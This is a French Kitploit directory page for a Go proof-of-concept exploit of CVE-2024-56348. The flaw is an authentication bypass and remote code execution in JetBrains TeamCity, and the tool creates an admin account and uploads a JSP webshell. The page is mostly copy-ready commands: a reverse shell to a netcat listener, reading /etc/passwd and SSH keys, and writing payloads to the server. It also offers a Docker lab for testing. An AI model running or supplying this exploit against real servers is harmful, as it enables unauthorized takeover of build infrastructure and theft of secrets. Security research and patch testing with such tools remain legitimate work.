Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-56348 — Exploit basé sur Go pour CVE-2024-56348 ciblant le contournement d'authentification et l'exécution de code à distance JetBrains TeamCity. Fournit un shell interactif, un shell inverse, la lecture/écriture de fichiers et l'exécution de commandes uniques sans identifiants. | Kitploit
Outils/GitHubGitHub/joshuavanderpoll/cve-2024-56348
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed TeamingOutil d'Accès à Distance
GitHubjoshuavanderpoll/cve-2024-56348

cve-2024-56348

Exploit basé sur Go pour CVE-2024-56348 ciblant le contournement d'authentification et l'exécution de code à distance JetBrains TeamCity. Fournit un shell interactif, un shell inverse, la lecture/écriture de fichiers et l'exécution de commandes uniques sans identifiants.

Voir le dépôtSite web
23il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

JetBrains TeamCity Contournement d'authentification + RCE (CVE-2024-56348) PoC

Go

📜 Description

CVE-2024-56348 est une vulnérabilité critique de contournement d'authentification dans JetBrains TeamCity on-premises affectant toutes les versions antérieures à 2024.12. L'API REST gère incorrectement les requêtes vers des chemins contenant ;.jsp, permettant à un attaquant non authentifié d'invoquer n'importe quel point de terminaison REST comme s'il était entièrement authentifié.

Cet exploit enchaîne le contournement avec la propre API REST de TeamCity pour créer un compte SYSTEM_ADMIN, générer un jeton API et obtenir une exécution de code à distance complète — soit via le point de terminaison de débogage intégré, soit via un webshell de plugin JSP téléversé dynamiquement. Aucun identifiant requis.

Versions affectées : JetBrains TeamCity on-premises < 2024.12

✨ Fonctionnalités

  • Shell interactif — pseudo-shell avec séparation stdout/stderr et code de sortie dans l'invite
  • Exécution de commande — commande unique via -command avec sortie complète stdout, stderr et code de sortie
  • Reverse shell — déploie un webshell de plugin JSP et déclenche un callback vers votre listener
  • Lecture de fichier — lit tout fichier accessible par le processus TeamCity
  • Écriture de fichier — dépose un contenu arbitraire sur n'importe quel chemin accessible en écriture sur le serveur

🛠️ Installation

root@kitploit:~
git clone https://github.com/joshuavanderpoll/cve-2024-56348.git
cd CVE-2024-56348
go build -o exp cve-2024-56348.go

Installer directement avec Go

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2024-56348@latest

Exécuter sans installation

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2024-56348@latest -t http://127.0.0.1:8111

⚙️ Utilisation

root@kitploit:~
  -t          Target URL  (e.g. http://127.0.0.1:8111)
  -command    Execute a single command and print output
  -shell      Spawn a reverse shell (requires -lhost and -lport)
  -lhost      Listener host for the reverse shell
  -lport      Listener port for the reverse shell
  -read-file  Read a remote file and print its contents
  -write-file Remote path to write to (requires -file-content)
  -file-content Content to write when using -write-file

L'absence de flag d'action ouvre automatiquement un shell interactif.


Vérification de vulnérabilité + shell interactif

Se connecte à la cible, confirme le contournement, crée un compte administrateur temporaire et ouvre un shell interactif. L'invite affiche le code de sortie de la dernière commande en vert (succès) ou en rouge (non nul).

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111

Shell interactif


Exécution d'une commande unique

Exécute une commande et affiche stdout, stderr et le code de sortie séparément.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -command "id"

Exécution de commande


Reverse shell

Déploie le webshell de plugin JSP et déclenche un reverse shell vers votre listener. Lancez nc -lvp 4444 d'abord.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -shell -lhost 10.0.0.1 -lport 4444

Reverse shell


Lecture de fichier

Lit tout fichier auquel le processus TeamCity a accès — utile pour les fichiers de configuration, les clés SSH, etc.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -read-file /etc/passwd

Lecture de fichier


Écriture de fichier

Écrit un contenu arbitraire vers un chemin distant. Utile pour déposer des payloads supplémentaires ou modifier la configuration.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -write-file /tmp/readme.txt -file-content "LEAVE ME HERE"

Écriture de fichier


🐋 Docker PoC

Un environnement Docker Compose autonome avec une instance TeamCity vulnérable pour des tests locaux. Consultez DOCKER.md pour plus de détails

root@kitploit:~
cd docker/
docker compose up -d
./cve-2024-56348 -t http://127.0.0.1:8111

Si le script renvoie « [-] Plugin upload failed. », essayez de vous connecter avec l'utilisateur hackindex et réessayez. (les identifiants se trouvent dans DOCKER.md)

🕵🏼 Références

  • JetBrains Security Advisory — CVE-2024-56348
  • NVD — CVE-2024-56348
  • HackIndex

📢 Avertissement

Cet outil est fourni à des fins éducatives et de recherche uniquement. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.

Télécharger l’outil